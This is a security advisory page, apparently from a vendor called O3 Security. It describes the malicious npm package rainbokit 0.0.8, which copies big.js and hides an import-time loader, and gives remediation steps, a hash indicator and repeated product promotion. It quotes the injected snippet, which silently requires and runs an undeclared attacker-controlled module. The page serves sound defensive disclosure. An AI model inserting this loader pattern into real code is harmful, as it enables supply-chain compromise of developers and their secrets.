Which versions of rainbokit are malicious?

The following npm versions of rainbokit are flagged malicious: 0.0.8. Treat any of these as compromised.

How do I remediate rainbokit if I installed it?

Remove rainbokit from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound activity or persistence.

I already installed rainbokit — how do I know if it already compromised me?

If rainbokit was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

Is rainbokit part of a known attack campaign?

Yes — rainbokit is associated with the IN-MAL-2026-007352 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

How do I find rainbokit across my projects, lockfiles, and CI pipelines?

Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for rainbokit (version 0.0.8). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging rainbokit across your stack and pipelines.

Malicious package

rainbokitnpm

Malicious code in rainbokit (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-6339

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall rainbokit

What this malware does

The package publishes as rainbokit but ships a verbatim copy of the legitimate big.js library (matching author, repository URL, README, LICENCE, and keywords) so that an installer inspecting the on-disk package cannot distinguish it from genuine big.js. Both big.js (~line 488) and big.mjs contain an injected block try { const doc = require("parket-slot"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { } inserted into the middle of the otherwise-unmodified big.js source. When a consumer does require('rainbokit') or import 'rainbokit', this block runs parket-slot.from_str() — code controlled by the attacker. The require is wrapped in an empty try/catch and the resulting promise's rejection handler is also empty, so any error is silently swallowed (anti-detection). parket-slot is not declared in dependencies; the only declared dependency is log-taker@^0.0.9, which is never referenced from the visible code. This declared-but-unused / used-but-undeclared split is consistent with a multi-package staging campaign where the attacker resolves parket-slot and log-taker from sibling packages they control. The combination of identity spoofing of a popular package, hidden second-stage loader fired at import time, and silent error suppression demonstrates intent to execute attacker-controlled code on installer machines.

Malicious versions

1 flagged

0.0.8

Indicators of compromise (SHA-256)

692bd458c1417d7b87761cfa62e666685cb8d2ebf605b54de3ef8ad5dd993555

Detection & response playbook

Malicious package

Find it
Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for rainbokit (version 0.0.8). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging rainbokit across your stack and pipelines.
If you installed it — respond
Remove rainbokit from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound activity or persistence.
Did it already run?
If rainbokit was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.
How O3 protects you
O3 blocks rainbokit before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. rainbokit on npm has been identified as a malicious package (version 0.0.8 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-007352

References

npmjs.com

Credits

Amazon Inspector · finder

Detect & block this

O3 blocks rainbokit-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the malicious outbound activity and severs the channel.

Malware detection Runtime egress monitoring